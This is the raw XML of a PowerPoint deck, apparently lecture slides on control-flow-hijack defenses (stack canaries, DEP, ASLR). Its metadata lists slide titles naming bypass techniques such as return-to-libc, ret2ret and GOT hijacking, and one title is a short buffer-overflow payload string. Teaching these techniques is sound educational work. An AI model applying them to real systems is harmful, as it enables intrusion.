<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ksAj0ahdYmykbgTqvvJoZw"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag66.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="QaEgROsvYJr9WlM1wRei0f"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag67.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Eo2HWuJV9V0smEon833pS8"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag68.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Gqvo4Ium2FZAvgeaSXL2Av"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag69.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="8tY7C9JbeBmvHCbxp1qMTk"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Xxl98tW482U5y9yxXQxUeK"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag70.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="tM879Xa5DQyah1pW5lDQqn"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag71.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="dZyBZkxJBNCN0cZvZL09Xw"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag72.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Xxl98tW482U5y9yxXQxUeK"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag73.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="yt1cXzmRPhqG21gPc4NxFz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag74.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="TUDQWsNaB3icYR7VvmIgcD"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag75.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ER6xg7Dt6H5Yz7z7DT3FGn"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag76.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="oP2pIhzqOomffMJobGx7WB"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag77.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="7Zh0mnJPcxXhtguRpmTGSG"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag78.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="BkSMneHn7yrNI37IUbHZbP"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag79.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="iYisUkgadgIqnX8zZu7Ppp"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="yt1cXzmRPhqG21gPc4NxFz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag80.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="PFyrKHrIYTvM1UtVkn7Xkb"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag81.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="5iF9AlbcRmpT8DUszyJvhO"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag82.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="VBWe54aJHs4EAfMB75wL18"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag83.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="m8LQ0RNyeOUgm4dmg727FX"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag84.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Ot2EGYrDYvMNeOse3jW8eg"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag85.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="KjTHnLPpJTtpjhOmaO7APo"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag86.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="uzPoT13JbwJyJILYBGNzMS"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag87.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jPuaqH871DqlPjSYRNl0IW"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag88.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="FLy5AbdqNgCBf0UJBmA3u6"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag89.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="8nSs6CO0dMam9JBk6XUBQ9"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="TUDQWsNaB3icYR7VvmIgcD"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag90.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Je3R47cZpEszDac84BBM3Q"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag91.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="rTRa7ggC9TgYEEpfxHOdmv"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag92.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Uz6r8XTiZ36SNaZT0VJNvz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag93.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jFvyJO4UYPuVYh4G8iJQUc"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag94.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="FaDbSJvOQYWtWxGbyfln2P"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag95.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="XdmHq0BQ1hpzXQZzFl9NZa"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag96.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="DT3wRDPQI7iQcqObivc0XF"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag97.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="4mzPbYz0efPNzsEU8Y1bzh"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag98.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="h7EzKt2EAZdYPGW2rQgHT3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag99.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="1oQmxoneZL6N5saCe5YAEQ"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="template">
  <a:themeElements>
    <a:clrScheme name="DBrumley201205 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="990000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E3E1E1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="990000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E47932"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00709E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="595A5A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="009446"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="936241"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000FF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="800080"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Office 2">
      <a:majorFont>
        <a:latin typeface="Calibri"/>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0000" dist="23000" dir="5400000" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="35000"/>
            </a:srgbClr>
          </a:outerShdw>
        </a:effectLst>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr sz="28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template">
  <a:themeElements>
    <a:clrScheme name="Custom 3">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFE"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="990000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFE"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A32D1F"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E47932"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="A32D1F"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="595A5A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="009446"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="936241"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000FF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="800080"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Office 2">
      <a:majorFont>
        <a:latin typeface="Calibri"/>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0000" dist="23000" dir="5400000" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="35000"/>
            </a:srgbClr>
          </a:outerShdw>
        </a:effectLst>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr sz="28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4300</TotalTime>
  <Words>3683</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>839</Paragraphs>
  <Slides>63</Slides>
  <Notes>28</Notes>
  <HiddenSlides>1</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>63</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="65" baseType="lpstr">
      <vt:lpstr>template</vt:lpstr>
      <vt:lpstr>1_template</vt:lpstr>
      <vt:lpstr>Control Flow Hijack Defenses Canaries, DEP, and ASLR</vt:lpstr>
      <vt:lpstr>Control Flow Hijack:  Always control + computation</vt:lpstr>
      <vt:lpstr>Control Flow Hijacks</vt:lpstr>
      <vt:lpstr>Control Flow Hijack Defenses</vt:lpstr>
      <vt:lpstr>Proposed Defense Scorecard</vt:lpstr>
      <vt:lpstr>Canary / Stack Cookies</vt:lpstr>
      <vt:lpstr>“A”x68 . “\xEF\xBE\xAD\xDE”</vt:lpstr>
      <vt:lpstr>“A”x68 . “\xEF\xBE\xAD\xDE”</vt:lpstr>
      <vt:lpstr>StackGuard</vt:lpstr>
      <vt:lpstr>gcc Stack-Smashing Protector (ProPolice)</vt:lpstr>
      <vt:lpstr>Canary should be HARD to Forge</vt:lpstr>
      <vt:lpstr>Canary Scorecard</vt:lpstr>
      <vt:lpstr>Bypass: Data Pointer Subterfuge</vt:lpstr>
      <vt:lpstr>Canary Weakness</vt:lpstr>
      <vt:lpstr>Data Execution Prevention (DEP) /  No eXecute (NX)</vt:lpstr>
      <vt:lpstr>How to defeat exploits?</vt:lpstr>
      <vt:lpstr>Data Execution Prevention</vt:lpstr>
      <vt:lpstr>W ^ X</vt:lpstr>
      <vt:lpstr>DEP Scorecard</vt:lpstr>
      <vt:lpstr>Bypass DEP: Return-to-libc Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Address Space Layout Randomization (ASLR)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ASLR</vt:lpstr>
      <vt:lpstr>Running cat Twice</vt:lpstr>
      <vt:lpstr>Memory</vt:lpstr>
      <vt:lpstr>ASLR Randomization</vt:lpstr>
      <vt:lpstr>Comparison</vt:lpstr>
      <vt:lpstr>ASLR Scorecard</vt:lpstr>
      <vt:lpstr>Ubuntu - ASLR</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>Brute Force</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>ret2text</vt:lpstr>
      <vt:lpstr>ret2text</vt:lpstr>
      <vt:lpstr>Function Pointer Subterfuge </vt:lpstr>
      <vt:lpstr>Function Pointers</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>ret2eax</vt:lpstr>
      <vt:lpstr>ret2eax</vt:lpstr>
      <vt:lpstr>ret2ret</vt:lpstr>
      <vt:lpstr>ret2ret (stack juggling)</vt:lpstr>
      <vt:lpstr>ret2pop</vt:lpstr>
      <vt:lpstr>ret2ret / ret2pop</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>Other Non-randomized Sections</vt:lpstr>
      <vt:lpstr>Dynamic Linking</vt:lpstr>
      <vt:lpstr>Dynamic Linking</vt:lpstr>
      <vt:lpstr>Dynamic Linking</vt:lpstr>
      <vt:lpstr>Exploiting the linking process</vt:lpstr>
      <vt:lpstr>GOT Hijacking</vt:lpstr>
      <vt:lpstr>GOT Hijacking</vt:lpstr>
      <vt:lpstr>GOT Hijacking</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>ret2libc</vt:lpstr>
      <vt:lpstr>Many techniques</vt:lpstr>
      <vt:lpstr>Return-to-libc Attack</vt:lpstr>
      <vt:lpstr>Motivation: Return-to-libc Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>In-class</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>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Darpa Presentation</dc:title>
  <dc:creator>ed</dc:creator>
  <cp:lastModifiedBy>Thanassis Avgerinos</cp:lastModifiedBy>
  <cp:revision>1682</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-02T18:57:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-07T13:44:25Z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DocumentId">
    <vt:lpwstr>11L1CS3lWunNfTuci5gPLtht4ZjOn7gyfIKyZn-f7p20</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Google.Documents.RevisionId">
    <vt:lpwstr>13701622749194124332</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Google.Documents.PreviousRevisionId">
    <vt:lpwstr>17594234182614114890</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Google.Documents.PluginVersion">
    <vt:lpwstr>2.0.2424.7283</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Google.Documents.MergeIncapabilityFlags">
    <vt:i4>0</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="Google.Documents.Tracking">
    <vt:lpwstr>false</vt:lpwstr>
  </property>
</Properties>
</file>